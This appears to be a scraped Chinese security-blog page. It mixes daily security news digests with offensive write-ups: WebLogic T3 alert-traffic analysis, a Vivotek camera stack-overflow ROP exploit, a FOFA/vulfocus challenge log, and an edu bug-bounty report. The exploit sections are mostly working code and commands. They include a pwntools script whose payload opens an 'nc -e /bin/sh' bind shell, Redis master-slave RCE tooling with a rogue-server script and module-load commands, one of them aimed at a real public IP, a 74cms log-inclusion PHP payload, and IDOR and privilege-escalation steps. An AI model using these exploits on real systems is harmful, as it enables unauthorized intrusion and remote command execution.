基于某商产品WeblogicT3反序列化告警流量分析
前言 护网时平时遇到的针对weblogic等中间件漏洞利用以及漏洞扫描的很多,但是我看到某态势的流量的时候发现态势的探针的监测不单单是基于披露的poc或者exp来产生的告警。 这里一万多条告警。 环境搭建 这里我使vulhub复现几个cve来分析流量,这里的目的主要是对比wireshark、科*分析软件和某商安全设备的全流量的数据包告警分析。 cd CVE-2020-14882 docker-compose up -d docker ps http://192.168.166.130:7001/console/login/LoginForm.jsp 分析 直接使用wireshark抓包是无法抓取不到数据包的,原因是nat模式下不走网卡,所以这里涉及到了tips就是添加路由 route add 192.168.166.130 mask 255.255.255.255 192.168.0.1 用完删除 route delete 192.168.166.130 mask 255.255.255.255 192.168.0.1 但是此时似乎是没有用的,因为我们在进行漏洞利用的时候走的是http协议,传输层走的是tcp但是依旧是无法看到详细的流量数据。 设置虚拟机为桥接模式,再次尝试获取流量 已成功获取到数据流量。使用命令查看对目标攻击的所有流量 ip.addr==192.168.0.120 追踪一下tcp流 直接追踪t3流量,因为weblogic使用的协议为T3,当然态势内的漏洞监测也是基于t3协议来告警触发的。 上面两部分的内容是客户端和服务端的信息 t3 7.0.0.0 AS:10 HL:19 HELO:12.2.1.3.false AS:2048 HL:19 MS:10000000 PN:DOMAIN 在使用paylaod的时候会给服务端发送请求,正常情况下我们能够找到的poc或者说exp的工作原理大部分都是基于版本来校验的 当然这里的环境版本为12.2.1.3.0 这里根据不通的流可以看出来。这一点儿的话其实可以根据python脚本的内容也能看出来校验机制,这一点儿跟很多厂商的漏扫的原理应该是一致的。 这里我执行了几条命令,来查看一下流量特征 whoami ls pwd 上传的shell.jsp文件做编码 序列化的部分就是在这一部分完成的 回头看一下某报警日志的流量 这里触发规则库的内容是由于探针监测到流量中存在序列化的操作就直接触发了,所以这个时候正常的日志也是会触发漏洞预警。 可能使用wireshark对tcp的交互看着不太清晰,使用科*网络分析 重新抓包 这是所有的攻击日志 可以看到tcp流中数据交互的流量包。 因为这里只显示数据块部分的数据,那么这里可以看到,同样文件上传的时候内容是分块传输的 分作了四个数据块进行传输。 安全设备的告警 上面是tcp部分流量 请求体内容 那么告警行为的触发已经不是基于weblogic正常利用时的流量了,此时只是在tcp的传输阶段就已经拒绝连接了。 思考 安全设备流量监控下的预警以及触发条件是基于全流量还是部分流量以及规则条件产生的,规则库基于POC以及EXP,但是可能不会考虑到是否有完整的利用链,所以用户的体验感就比较难受了。
网络安全日报 2022年07月12日
免责声明:以下内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以下内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。 1、专家警告新的 0mega 勒索软件针对全球组织 https://securityaffairs.co/wordpress/133098/malware/0mega-ransomware.html 2、黑客利用虚假工作机会从 Axie Infinity 窃取 5.4 亿美元 https://securityaffairs.co/wordpress/133113/cyber-crime/axie-infinity-hack-fake-job-offer.html 3、研究表明未来五年在线支付欺诈将高达 3430 亿美元 https://www.infosecurity-magazine.com/news/online-payment-fraud-five-years/ 4、PyPl 正在为关键项目推出 2FA https://www.zdnet.com/article/python-programming-pypl-is-rolling-out-2fa-for-critical-projects-giving-away-4000-security-keys/ 5、Anubis Network 携新的 C2 服务器回归大规模网络钓鱼活动 https://securityaffairs.co/wordpress/133115/hacking/anubis-networks-new-c2.html 6、英国金融服务公司Aon遭黑客入侵泄露客户信息 https://www.infosecurity-magazine.com/news/aon-hack-sensitive-information/ 7、欧盟网络安全组织ENISA发布新威胁态势分析法 https://securityaffairs.co/wordpress/132973/security/enis-athreat-landscape-methodology.html 8、QNAP警告说新勒索软件Checkmate正针对NAS设备 https://securityaffairs.co/wordpress/132989/malware/checkmate-ransomware-targets-qnap-nas.html 9、漏洞百出的 "用谷歌登录 "API让加密货币面临账户接管风险 https://www.darkreading.com/application-security/cryptocurrency-api-vulnerability-opens-wallets-to-account-takeovers 10、黑客公布伊朗钢铁制造企业近20G绝密文件 https://www.secrss.com/articles/44473
网络安全日报 2022年07月11日
免责声明:以下内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以下内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。 1、新的“HavanaCrypt”勒索软件以假谷歌软件更新的形式分发 https://www.securityweek.com/new-havanacrypt-ransomware-distributed-fake-google-software-update 2、Fortinet 修补了多个产品中的高危漏洞 https://www.securityweek.com/fortinet-patches-high-severity-vulnerabilities-several-products 3、研究人员演示了如何通过 Rolling-PWN 攻击解锁多款本田车型 https://securityaffairs.co/wordpress/133090/hacking/honda-rolling-pwn-attack.html 4、法国电话运营商 La Poste Mobile 遭受勒索软件攻击 https://securityaffairs.co/wordpress/133080/cyber-crime/la-poste-mobile-ransomware.html 5、Apple 计划推出锁定模式功能以保护用户免受"高度针对性的网络攻击" https://securityaffairs.co/wordpress/133065/mobile-2/apple-lockdown-mode.html 6、Emsisoft发布 AstraLocker 和 Yashma 勒索软件免费解密工具 https://securityaffairs.co/wordpress/133014/malware/emsisoft-astralocker-yashma-decryptor.html 7、Atlassian修复了Jira中的服务器端请求伪造漏洞 https://portswigger.net/daily-swig/atlassian-patches-full-read-ssrf-in-jira 8、思科发布安全更新修复了影响多个产品的漏洞 https://securityaffairs.co/wordpress/133020/security/cisco-cisco-expressway-flaw.html 9、攻击者利用Follina漏洞部署Rozena后门 https://www.fortinet.com/blog/threat-research/follina-rozena-leveraging-discord-to-distribute-a-backdoor 10、Node.js修复多个RCE和HTTP请求走私漏洞 https://portswigger.net/daily-swig/node-js-fixes-multiple-bugs-that-could-lead-to-rce-http-request-smuggling
vivotek栈溢出漏洞复现
一、前言 近日公司进了一批摄像头,以前还没有做过这方面的研究所以找了一个vivotek 2017年的栈溢出漏洞拿来练练手。 二、固件仿真 虚拟机环境:Ubuntu 20.04 gdb版本:GNU gdb (Ubuntu 9.2-0ubuntu1~20.04.1) 9.2 固件下载地址:https://github.com/mcw0/PoC/files/3128058/CC8160-VVTK-0100d.flash.zip 从上面的地址下载还有漏洞的固件,使用binwalk分离出来文件系统,发现问题文件httpd位于/usr/sbin目录下,使用file命令查看文件类型 因为是arm架构的所以没法在本地跑,使用QEMU模拟运行 因为QEMU模拟的环境不会挂载dev和proc,所以我们这边将固件系统的这两个目录挂载到虚拟机的dev和proc中。 sudo mount -o bind /dev ./squashfs-root/dev/ sudo mount -t proc /proc/ ./squashfs-root/proc/ 再次运行httpd文件,发现这次报了其他的错误 打开ida定位报错语句的位置,可以看到/etc/conf.d/boa/boa.conf文件打开失败导致的 本地ls查看会发现conf.d是链接到/mnt/flash/etc/conf.d的,并且该目录为空 尝试在其他目录中寻找boa.conf文件,最终在如下的目录找到了它,将此目录下的/etc复制到/mnt/flash/目录下 再次运行httpd文件,发现报了如下错误 老办法通过IDA搜索报错字符串,定位到如下位置,可以发现报错原因是因为此程序中使用gethostname函数将主机名保存在rlimits中,并使用gethostbyname函数通过主机名找到IP地址。但是最终因为我们的主机名与固件中的主机名不同所以无法获取到IP地址。 这里我们可以通过hostname命令查看本机名,然后以我的本机名为例修改squashfs-root/etc/hosts中的内容 echo "127.0.0.1 amall-virtual localhost" > squashfs-root/etc/hosts 修改完成后再次运行httpd文件,可以看到已经成功启动 三、漏洞分析 我们根据poc来验证漏洞 echo -en "POST /cgi-bin/admin/upgrade.cgi HTTP/1.0\nContent-Length:AAAAAAAAAAAAAAAAAAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIXXXX\n\r\n\r\n"  | netcat -v 127.0.0.1 80 验证成功,可以看到程序崩溃信息。我们根据poc可以了解到漏洞是在Content-Length中出现的,从IDA中搜索字符串然后查看交叉引用定位到漏洞位置所在 根据反汇编的代码我们可以了解到,程序在处理Content-Length字符串的内容时,使用strncpy函数保存从`:`到`\n`之间的字符串,但是可以看到其中并没有对长度进行检测导致了用户可以输入任意长度的字符串造成栈溢出。 四、漏洞复现 在arm的栈溢出中,我们首要考虑的就是如何劫持pc寄存器,而这个偏移可以通过动调获得。 看一下保护,开启了NX保护所以无法利用shellcode,考虑使用ROP来绕过NX保护。 为了能够查看程序的执行流程,这里选择将文件系统和gdbserver一起传到qemu虚拟机里,下面的内容根据[driverxdw](https://xz.aliyun.com/t/5054#toc-2)师傅的这篇文章整理得到。 从arm-debian的qemu镜像地址下载如下三个文件 https://people.debian.org/~aurel32/qemu/armel/vmlinuz-3.2.0-4-versatile https://people.debian.org/~aurel32/qemu/armel/initrd.img-3.2.0-4-versatile https://people.debian.org/~aurel32/qemu/armel/debian_wheezy_armel_standard.qcow2 在本地新建一张网卡用于和qemu虚拟机通信 sudo tunctl -t tap0 -u `whoami` sudo ifconfig tap0 192.168.2.1/24 启动qemu虚拟机镜像 qemu-system-arm -M versatilepb -kernel vmlinuz-3.2.0-4-versatile -initrd initrd.img-3.2.0-4-versatile -hda debian_wheezy_armel_standard.qcow2 -append "root=/dev/sda1"  -net nic -net tap,ifname=tap0,script=no,downscript=no -nographic 启动成功后会让你输入用户名密码,默认用户名/密码:root/root,然后在qemu虚拟机中配置网卡信息,这样qemu虚拟机就可以和本地进行通信了 ifconfig eth0 192.168.2.2/24 接下来使用ftp把固件的文件系统get到qemu虚拟机中,此时我们就可以挂载/dev和/proc了。 mount -o bind /dev ./squashfs-root/dev mount -t proc /proc/ ./squashfs-root/proc/ 最后切换到固件的文件系统中,并运行漏洞文件 chroot squashfs-root sh ./usr/sbin/httpd 这时我们就可以开始调试工作了,采用gdb-multiarch&gdbserver的方式。但是在试过网上编译好的gdbserver以后都无法在远程target remote到,最后在[这篇文章](https://bbs.pediy.com/thread-220907.htm)中找到了答案,按照上面的步骤我编译了一份与我本地gdb版本相同的gdbserver-static,文件上传到github上了有需要的师傅可以自行下载。 github地址:https://github.com/AmaIIl/gdbserver-static-9.2-arm 有了对应版本的gdbserver就可以开始远程调试了,具体命令如下所示 ./gdbserver-static 127.0.0.1:1234 --attach <server pid> 然后写一个gdbinit把重复的命令写进去方便调试 # gdb-multiarch -x gdbinit file ./usr/sbin/httpd set architecture arm target remote 192.168.2.2:1234 我们将断点下在函数退栈的位置,然后计算其与输入地址的差值就可以得到溢出偏移。为了降低利用难度这里关闭qemu虚拟机的aslr保护,可以节省几步内存泄露的步骤。 sudo sysctl -w kernel.randomize_va_space=0 通过动调我们可以得到需要的所有条件:溢出偏移、栈地址、libc地址。但是要构造ROP还需要一些gadget,使用ropper搜索我们需要的gadget,最终我们需要构造的就是system("XXX")的效果,所以需要能控制pc和r0寄存器的gadget,同时因为程序漏洞使用strncpy函数所以gadget中不能含有零字符,所以最终选择了这两段gadget 0x00048784: pop {r1, pc}; 0x00016aa4: mov r0, r1; pop {r4, r5, pc}; exp如下所示 from pwn import * context.log_level = 'debug' r = lambda : p.recv() rx = lambda x: p.recv(x) ru = lambda x: p.recvuntil(x) rud = lambda x: p.recvuntil(x, drop=True) s = lambda x: p.send(x) sl = lambda x: p.sendline(x) sa = lambda x, y: p.sendafter(x, y) sla = lambda x, y: p.sendlineafter(x, y) close = lambda : p.close() debug = lambda : gdb.attach(p) shell = lambda : p.interactive() p = remote('192.168.2.2', 80) libc = ELF('./squashfs-root/lib/libc.so.0') stack = 0xbeffeb64 base = 0xb6f2d000 system = base+libc.sym['system'] pop_r1_pc = 0x00048784+base mov_r0_r1 = 0x00016aa4+base # mov r0, r1; pop {r4, r5, pc};  head = "POST /cgi-bin/admin/upgrade.cgi HTTP/1.0\nContent-Length:" payload = 'b'*(0x00003c-8)+p32(pop_r1_pc)+p32(stack)+p32(mov_r0_r1)+'b'*8+p32(system) end = 'nc  -lp 6666 -e /bin/sh;'+'\r\n\r\n' sl(head+payload+end) shell() 脚本执行成功后会开启6666端口,这时只要用nc远程连接即可getshell 五、总结 还是那个感觉,复现iot最难的步骤还是环境搭建。在gdbserver那里卡住了很久,本地编译也是各种报错,不过好在最后都一一解决了。2017年的这个栈溢出漏洞整体利用难度不算高,感兴趣的师傅们可以动手试着复现一下。
网络安全日报 2022年07月08日
免责声明:以下内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以下内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。 1、美国防部针对公开资产的重大漏洞推出赏金计划 https://www.securityweek.com/dod-launches-hack-us-bounties-major-flaws-publicly-exposed-assets 2、美国:朝鲜黑客利用 Maui Ransomware 攻击医疗保健行业 https://www.securityweek.com/us-north-korean-hackers-targeting-healthcare-sector-maui-ransomware 3、大规模加密货币挖矿活动针对 NPM JavaScript 包存储库 https://securityaffairs.co/wordpress/132983/cyber-crime/cuteboi-cryptomining-campaign-npm.html 4、研究人员发现一种新的 Linux 恶意软件:OrBit,但未被检测到 https://securityaffairs.co/wordpress/132966/hacking/orbit-linux-malware.html 5、IT 服务巨头 SHI International 遭受破坏性恶意软件攻击 https://www.bleepingcomputer.com/news/security/it-services-giant-shi-hit-by-professional-malware-attack/ 6、由于绑定机制漏洞,黑客可通过"ExpressLRS"协议接管无人机 https://threatpost.com/drone-hack-expresslrs-hijacked/180133/ 7、Bitter APT黑客组织以孟加拉国军事实体为目标 https://www.secuinfra.com/en/techtalk/whatever-floats-your-boat-bitter-apt-continues-to-target-bangladesh/ 8、黑客滥用Brute Ratel红队工具进行攻击以逃避检测 https://unit42.paloaltonetworks.com/brute-ratel-c4-tool/#Conclusion 9、QNAP 警告针对 NAS 设备的新 Checkmate 勒索软件 https://www.bleepingcomputer.com/news/security/qnap-warns-of-new-checkmate-ransomware-targeting-nas-devices/ 10、微软悄悄修复 ShadowCoerce Windows NTLM Relay 漏洞 https://www.bleepingcomputer.com/news/microsoft/microsoft-quietly-fixes-shadowcoerce-windows-ntlm-relay-bug/
FOFA-攻防挑战记录
记录一下中途短暂的辉煌时刻    辉煌一刻谁都有,别拿一刻当永久      在昨天初尝战果之后,今天又习惯性的打开 https://vulfocus.cn/ 发现今天还有挑战赛,按捺不住躁动的心,又开始了学习。今天主要拿下的是这四个镜像,同时我也会对我了解的漏洞详情做一个具体的分析    weblogci CVE_2020_2551   我们看到了对应的端口有 7001      看到熟悉的界面以及之前察觉的端口信息,感觉有可能是 weblogic ,加上路径 console 查看一下,是 weblogic 10.3.6.0   weblogic 存在的漏洞太多了,所以我们直接上漏洞扫描工具     看到了漏洞对应的编号,以及存在的回显链路 phpinfo 信息泄露   打开界面就是一个 phpinfo   尝试了扫路径,查 phpinfo 漏洞的操作无果后,于是直接在页面上查找关键词 flag     轻易就查询到了 flag 的值,这个题目给 5 分 我是没有想到的 Redis 未授权访问漏洞   一看对应映射的端口是 6379 立马就联想到了 Redis,同时这个端口无法从 web 端进行访问,所以基本可以肯定是 Redis 了   注意到版本是 4.0.14   针对于 Redis 未授权访问漏洞,有以下利用方法 利用 Redis 写入webshell 写 ssh-keygen 公钥登录服务器 利用计划任务反弹shell 利用主从复制获取shell   这里我们选用 主从复制漏洞来获取shell   在服务器上操作(今天借到了服务器) git clone https://github.com/n0b0dyCN/RedisModules-ExecuteCommand.git cd RedisModules-ExecuteCommand/ make # 生成 /RedisModules-ExecuteCommand/src/module.so cd .. git clone https://github.com/Ridter/redis-rce.git cd redis-rce/ cp ../RedisModules-ExecuteCommand/src/module.so ./ pip install -r requirements.txt python redis-rce.py  -r 123.58.236.76 -p 57119 -L 43.142.138.251 -f module.so       利用主从复制获取shell   Redis是一个使用ANSI C编写的开源、支持网络、基于内存、可选持久性的键值对存储数据库。但如果当把数据存储在单个Redis的实例中,当读写体量比较大的时候,服务端就很难承受。为了应对这种情况,Redis就提供了主从模式,主从模式就是指使用一个redis实例作为主机,其他实例都作为备份机,其中主机和从机数据相同,而从机只负责读,主机只负责写,通过读写分离可以大幅度减轻流量的压力,算是一种通过牺牲空间来换取效率的缓解方式。   在Reids 4.x之后,Redis新增了模块功能,通过外部拓展,可以实现在Redis中实现一个新的Redis命令,通过写C语言编译并加载恶意的.so文件,达到代码执行的目的。 Linux   在本机上弄的时候出现各种各样的奇葩的问题,给我整破防了,最后我采用了 docker 来进行复现。复现不同的利用都删掉 docker ,重启继续进行。最后发现主从复制的利用版本是 4.x-5.x,从 6.0开始,就无法利用成功,写入exp.so 也是可以的,module 加载时会失败,提示没有权限,给 exp.so 权限后时可以的。 sudo docker pull vertigo/redis4 sudo docker run -p 6379:6379 vertigo/redis4 redis-rce   https://github.com/Ridter/redis-rce   生成恶意.so文件,下载RedisModules-ExecuteCommand使用make编译即可生成 git clone https://github.com/n0b0dyCN/RedisModules-ExecuteCommand.git cd RedisModules-ExecuteCommand/ make # 生成 /RedisModules-ExecuteCommand/src/module.so cd .. git clone https://github.com/Ridter/redis-rce.git cd redis-rce/ cp ../RedisModules-ExecuteCommand/src/module.so ./ pip install -r requirements.txt python redis-rce.py -r 192.168.10.187 -p 6379 -L 192.168.10.1 -f module.so redis-rogue-server   https://github.com/n0b0dyCN/redis-rogue-server git clone https://github.com/n0b0dyCN/redis-rogue-server.git cd redis-rogue-serve python3 redis-rogue-server.py --rhost 192.168.10.187 --lhost 192.168.10.1 Redis主从复制手动挡 import socket from time import sleep from optparse import OptionParser def RogueServer(lport):    resp = ""    sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)    sock.bind(("0.0.0.0",lport))    sock.listen(10)    conn,address = sock.accept()      sleep(5)    while True:        data = conn.recv(1024)        if "PING" in data:            resp="+PONG"+CLRF            conn.send(resp)        elif "REPLCONF" in data:            resp="+OK"+CLRF            conn.send(resp)        elif "PSYNC" in data or "SYNC" in data:            resp =  "+FULLRESYNC " + "Z"*40 + " 1" + CLRF            resp += "quot; + str(len(payload)) + CLRF            resp = resp.encode()            resp += payload + CLRF.encode()            if type(resp) != bytes:                resp =resp.encode()                  conn.send(resp)        #elif "exit" in data:            break if __name__=="__main__":    parser = OptionParser()                    parser.add_option("--lport", dest="lp", type="int",help="rogue server listen port, default 21000", default=21000,metavar="LOCAL_PORT")        parser.add_option("-f","--exp", dest="exp", type="string",help="Redis Module to load, default exp.so", default="exp.so",metavar="EXP_FILE")         (options , args )= parser.parse_args()    lport = options.lp    exp_filename = options.exp    CLRF="\r\n"    payload=open(exp_filename,"rb").read()    print "Start listing on port: %s" %lport    print "Load the payload:   %s" %exp_filename      RogueServer(lport) redis-cli -h 192.168.10.187 > ping > config set dir ./               # 设置redis的备份路径为当前目录 > config set dbfilename exp.so    # 设置备份文件名为exp.so,默认为dump.rdb > slaveof 192.168.10.1 9999       # 设置主服务器IP和端口 > module load ./exp.so            # 加载恶意模块 > slaveof no one                  # 切断主从,关闭复制功能 > system.exec 'whoami'            # 执行系统命令 > config set dbfilename dump.rdb  # 通过dump.rdb文件恢复数据 > system.exec 'rm ./exp.so'       # 删除exp.so > module unload system            # 卸载system模块的加载    windows   Redis 官方没有提供 windows 版的安装包,windows 下使用的 Redis 还是 3.X 版本的。 redis 在写文件的时候会有一些版本信息以及脏数据,无法写出正常的DLL、EXE、LINK 等文件,所以 对 Windows 下的 redis 的利用方法主要是往 web 目录写马以及写启动项。 RedisWriteFile   https://github.com/r35tart/RedisWriteFile 利用Redis的主从同步写数据,脚本将自己模拟为master,设置对端为slave, master 数据空间保证绝对干净,轻松实现了写无损文件。   参考文章 http://r3start.net/index.php/2020/05/25/717 https://xz.aliyun.com/t/7940可以利用以下方式 系统 DLL劫持 (目标重启或注销) 针对特定软件的 DLL 劫持(目标一次点击) 覆写目标的快捷方式 (目标一次点击) 覆写特定软件的配置文件达到提权目的 (目标无需点击或一次点击) 覆写 sethc.exe 等文件 (攻击方一次触发) mof 等   因为对这些暂时还没有研究,所以在这里只演示以下,在 windows redis 写无损文件 python RedisWriteFile.py --rhost=[target_ip] --rport=[target_redis_port] --lhost=[evil_master_host] --lport=[random] --rpath="[path_to_write]" --rfile="[filename]" --lfile=[filename] python3 RedisWriteFile.py --rhost=192.168.10.190 --rport=6379 --lhost=192.168.10.1  --lport=9999 --rpath="C:\Users\Public" --rfile="test.txt"  --lfile="test.txt"   哇,这个无损写文件真是 yyds,在 linux 下利用也是没有一点问题。    骑士cms 存在模板解析漏洞   打开页面就是 骑士cms,想到了骑士 cms 的历史漏洞 文件包含漏洞(thinkphp3 的文件包含)   这样操作 http://74cms.test/index.php?m=home&c=index&a=assign_resume_tpl POST: variable=1&tpl=<?php phpinfo(); ob_flush();?>/r/n<qscms/company_show 列表名="info" 企业id="$_GET['id']"/> http://74cms.test/index.php?m=home&c=index&a=assign_resume_tpl POST: variable=1&tpl=data/Runtime/Logs/Home/22_06_28.log           漏洞的原理主要是通过将代码通过报错信息写到日志文件中,再利用文件包含实现代码执行。
网络安全日报 2022年07月07日
免责声明:以下内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以下内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。 1、用 Rust 编写的Hive勒索软件变种出现 https://www.securityweek.com/evasive-rust-coded-hive-ransomware-variant-emerges 2、万豪国际遭遇新的数据泄露,攻击者窃取了 20GB 数据 https://securityaffairs.co/wordpress/132943/data-breach/marriott-new-data-breach.html 3、OpenSSL 为可能导致 RCE 攻击的高危漏洞发布补丁 https://thehackernews.com/2022/07/openssl-releases-patch-for-high.html 4、NIST 宣布前四种抗量子攻击的密码算法 https://thehackernews.com/2022/07/nist-announces-first-four-quantum.html 5、新的 RedAlert 勒索软件针对 Windows、Linux VMware ESXi 服务器 https://www.bleepingcomputer.com/news/security/new-redalert-ransomware-targets-windows-linux-vmware-esxi-servers/ 6、网络钓鱼诈骗冒充阿联酋政府人力资源部针对中东 https://www.cloudsek.com/threatintelligence/advanced-phishing-scams-target-individuals-businesses-in-the-middle-east/ 7、Spring Data MongoDB修复一个严重的SpEL注入漏洞 https://portswigger.net/daily-swig/spring-data-mongodb-hit-by-another-critical-spel-injection-flaw 8、卡巴斯基推出针对手机跟踪软件检测的免费工具 https://www.bleepingcomputer.com/news/security/astralocker-ransomware-shuts-down-and-releases-decryptors/ 9、PCI DSS 4.0发布以应对新兴威胁和技术 https://www.helpnetsecurity.com/2022/07/05/pci-dss-4-0-released/ 10、调查显示传统数据安全工具面对勒索软件攻击的失败率高达 60% https://www.ithome.com/0/627/965.htm
网络安全日报 2022年07月06日
免责声明:以下内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以下内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。 1、大规模的网络攻击袭击了特拉维夫地铁IT设施 https://securityaffairs.co/wordpress/132897/hacking/tel-aviv-metro-company-attacked.html2、AstraLocker 勒索软件关闭了其运营并放出了解密器 https://securityaffairs.co/wordpress/132871/malware/astralocker-ransomware-shut-down.html3、研究人员发现恶意 NPM 包从应用程序和 Web 表单中窃取数据 https://thehackernews.com/2022/07/researchers-uncover-malicious-npm.html4、德国提出应对卫星网络威胁的计划 https://www.theregister.com/2022/07/05/bsi_satellite_baseline/5、Cyber Europe 2022:欧盟完成超大规模网络战争演习 https://portswigger.net/daily-swig/cyber-europe-2022-eu-completes-large-scale-cyber-war-game-exercise6、Talos研究人员分享了揭露暗网上匿名勒索软件网站的技术 https://thehackernews.com/2022/07/researchers-share-techniques-to-uncover.html7、报告显示2022 年十大高薪紧缺技能:网络安全排名第一 https://www.secrss.com/articles/442958、媒体六问“学习通数据疑泄露”:如何被窃取?平台要担何责? https://www.cnbeta.com/articles/tech/1287461.htm9、招聘网站 51job 个人信息数据库泄露?官方回应称无异常 https://www.secrss.com/articles/4429210、乌克兰核电站遭到物理/网络协同攻击?微软报告遭众多网络专家质疑 https://www.cyberscoop.com/cybersecurity-experts-question-microsofts-ukraine-report/
网络安全日报 2022年07月05日
免责声明:以下内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景网安实验室观点,因此第三方对以下内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景网安实验室无关。以下内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景网安实验室一律不予承担。 1、Chrome 103 发布紧急更新补丁修复了一个被利用的0day漏洞 https://www.securityweek.com/emergency-chrome-103-update-patches-actively-exploited-vulnerability 2、 Django Web 框架修复了高危SQL注入漏洞 https://securityaffairs.co/wordpress/132853/security/django-framework-sql-injection.html 3、CISA 命令联邦机构在 7 月 22 日之前修补 CVE-2022-26925 https://securityaffairs.co/wordpress/132830/security/cisa-orders-patch-cve-2022-26925.html 4、研究人员发现一群未成年人在Discord平台开发、出售恶意软件 https://www.hackread.com/teen-hackers-discord-sell-malware-for-quick-cash/ 5、英国陆军YouTube和Twitter账户遭黑客入侵 https://www.theverge.com/2022/7/3/23193668/british-army-youtube-twitter-accounts-hacked-promote-crypto-scam-fraud 6、钓鱼邮件伪装成加拿大税务机构窃取用户信息 https://www.welivesecurity.com/2022/07/01/phishing-scam-posing-canadian-tax-agency-canada-day/ 7、俄罗斯政府转向 Linux 操作系统 https://www.solidot.org/story?sid=71998 8、企业SaaS软件Zoho某个工具的关键漏洞遭在野利用 https://www.bleepingcomputer.com/news/security/zoho-manageengine-adaudit-plus-bug-gets-public-rce-exploit/ 9、微软更新Azure AD,支持临时密码 https://www.bleepingcomputer.com/news/microsoft/microsoft-updates-azure-ad-with-support-for-temporary-passcodes/ 10、美国网络安全出口管制文件《信息安全控制:网络安全物项》解读 https://www.freebuf.com/articles/neopoints/337315.html
一次edu证书站的挖掘
前言 最近edusrc上了新证书,这不得安排他一手。 确定目标 话不说信息收集一手,直接打开fofa,使用语法title="XXX大学",找到了一个系统 看到登录框,可能大家都会先进行弱口令的爆破,可能是我脸黑,遇到这种我就没有一次能爆破出来的,所以我比较喜欢测试未授权访问,这里我随便输了个账号密码 返回抓取这个接口的返回包,返回包里返回了500 这里我把它改成了两百,能进去系统,但是没有任何的数据信息 然后我直接F12查看源代码,找到了一处路由,/EmployeeManager,将他拼接在网址后面 访问 直接一手未授权访问,中危到手,原本想着提交上去手工了的,但一看证书兑换条件,得两个中危,这不是为难我胖虎吗,没办法就能继续加班,于是我利用了刚才获取到的用户名密码登录 登录进去后有一个个人承诺,需要点了同意才能下一步,让后点击同意进行抓包  接口返回了用户的sf证和密码,接着把EmployeeID=000005 改成000006  又是一个水平越权,泄露了用户敏感信息,中危有应该是稳了,然后我注意到了这个系统是区分管里员和普通用户的,就是一个前端可以选择角色类型进行登录,然后我想到能不能用普通用户的账号密码登录,然后越权到管理员的权限,在登录时进行抓包 拦截这个接口的返回包 把QX改成管理员,然后放包 可以看到已经越权成了管理员的sf  结束 都是很常规的漏洞,最重要的就是细心了。
第2页 第3页 第4页 第5页 第6页 第7页 第8页 第9页 第10页 第11页 第12页 第13页 第14页 第15页 第16页 第17页 第18页 第19页 第20页 第21页 第22页 第23页 第24页 第25页 第26页 第27页 第28页 第29页 第30页 第31页 第32页 第33页 第34页 第35页 第36页 第37页 第38页 第39页 第40页 第41页 第42页 第43页 第44页 第45页 第46页 第47页 第48页 第49页 第50页 第51页 第52页 第53页 第54页 第55页 第56页 第57页 第58页 第59页 第60页 第61页 第62页 第63页 第64页 第65页 第66页 第67页 第68页 第69页 第70页 第71页 第72页 第73页 第74页 第75页 第76页 第77页 第78页 第79页 第80页 第81页 第82页 第83页 第84页 第85页 第86页 第87页 第88页 第89页 第90页 第91页 第92页 第93页 第94页 第95页 第96页 第97页 第98页 第99页 第100页 第101页 第102页 第103页 第104页 第105页 第106页 第107页 第108页 第109页 第110页 第111页 第112页 第113页 第114页 第115页 第116页 第117页 第118页 第119页 第120页 第121页 第122页 第123页 第124页 第125页 第126页 第127页 第128页 第129页 第130页 第131页 第132页 第133页 第134页 第135页 第136页 第137页 第138页 第139页 第140页 第141页 第142页 第143页 第144页 第145页 第146页 第147页 第148页 第149页 第150页 第151页 第152页 第153页 第154页 第155页 第156页 第157页 第158页 第159页 第160页 第161页 第162页 第163页 第164页 第165页 第166页 第167页 第168页 第169页 第170页 第171页 第172页 第173页 第174页 第175页 第176页 第177页 第178页 第179页 第180页 第181页 第182页 第183页 第184页 第185页 第186页 第187页 第188页 第189页 第190页 第191页 第192页 第193页 第194页 第195页 第196页 第197页 第198页 第199页 第200页 第201页 第202页 第203页 第204页 第205页 第206页 第207页 第208页 第209页 第210页 第211页